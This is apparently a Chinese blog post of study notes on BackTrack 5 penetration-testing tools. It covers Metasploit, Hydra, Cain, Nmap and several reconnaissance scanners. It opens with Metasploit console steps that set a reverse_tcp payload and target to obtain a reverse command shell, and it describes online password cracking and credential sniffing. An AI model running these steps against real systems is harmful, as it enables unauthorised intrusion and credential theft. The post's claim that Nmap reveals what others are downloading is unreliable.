網絡漏洞攻擊工具
-
Metasploit
先msfupdate升級:
然後選擇msfconsole:
接下來:
set LHOST 本機IP地址
setLPORT 4445
setg PAYLOAD windows/shell/reverse_tcp
setg RHOST 目標IP地址
setg port 21
set target 隨意數字
exploit
這樣就可以反彈一個cmd shell了。
密碼破解
-
Hydra
多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各類主流服務進行在線密碼破解攻擊嘗試攻擊。
字典破解,Protocol中有很多,主要是之前掃描出來的端口開放情況來進行的。
Windows下滲透工具介紹
-
maltegoCE
DNS收集。
-
IBM Rational AppScan
自動化web應用的安全漏洞評估工作,能掃描和檢測所以常見的web應用安全漏洞,例如SQL注入、跨站點腳本攻擊、緩衝區溢出以及最新的FLASH/FLEX應用和Web2.0應用暴露等方面安全漏洞掃描。
-
SmartWhois
查找所以關於IP地址、主機名或者域名的可用信息,包括國家、州或省、沉城市、網絡供應方、網絡管理員和技術支持信息。
-
Sam Spade
如果一個黑客想查詢一個有域名的公司的某些信息,通常可以對該域名執行whois命令來找到附加信息。UNIX的大多數版本都裝有whois,所以黑客只需要在終端窗口或者命令提示前輸入“whois 要攻擊的域名”就可以了。而對於windows的操作系統,要執行whois命令就需要一個第三方的工具:sam spade。
-
Cain
可以破解屏保、PWL密碼、共享密碼、緩存口令、遠程共享口令、SMB口令、支持VNC口令解碼、Cisco Type-7口令解碼、Base64口令解碼、SQL Server 7.0/2000口令解碼、Remote Desktop口令解碼、Access Database口令解碼、Cisco PIX Firewall口令解碼、Cisco MD5解碼、NTLM Session Security口令解碼、IKE Aggressive Mode Pre-Shared Keys口令解碼等綜合工具,還可以遠程破解,可以掛字典以及暴力破解,其sniffer功能極其強大,幾乎可以明文捕獲一切帳號口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等
-
FOCA Free
可以找出更多有關分析網站提供的任何文件的元數據。
-
Nessus
前面講到過。= =
-
Nmap – Zenmap GUI
一個網絡掃描程序,你還可以用它來看別人電腦在下載什麼。
-
Metasploit
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,密碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。
-
Firefox Portable
火狐的插件。
-
獲取的知識
再次感謝《back track 5 從入門到精通 ——滲透之道》這本書。
這本書算是邊學習邊操作邊記錄邊分享的完成了,但是BT5裏面還有很多工具,以後我會主要分享裏面很實用很實用的工具。
希望學習完這本書能夠BT5基本入個門,在打開每個工具的時候,都會有幫助,太棒了~~~其實可以直接看幫助的,但是全是英文,雖然我個人覺得我的英文還不錯。
轉載請註明出處:http://www.cnblogs.com/yydcdut/p/3491302.html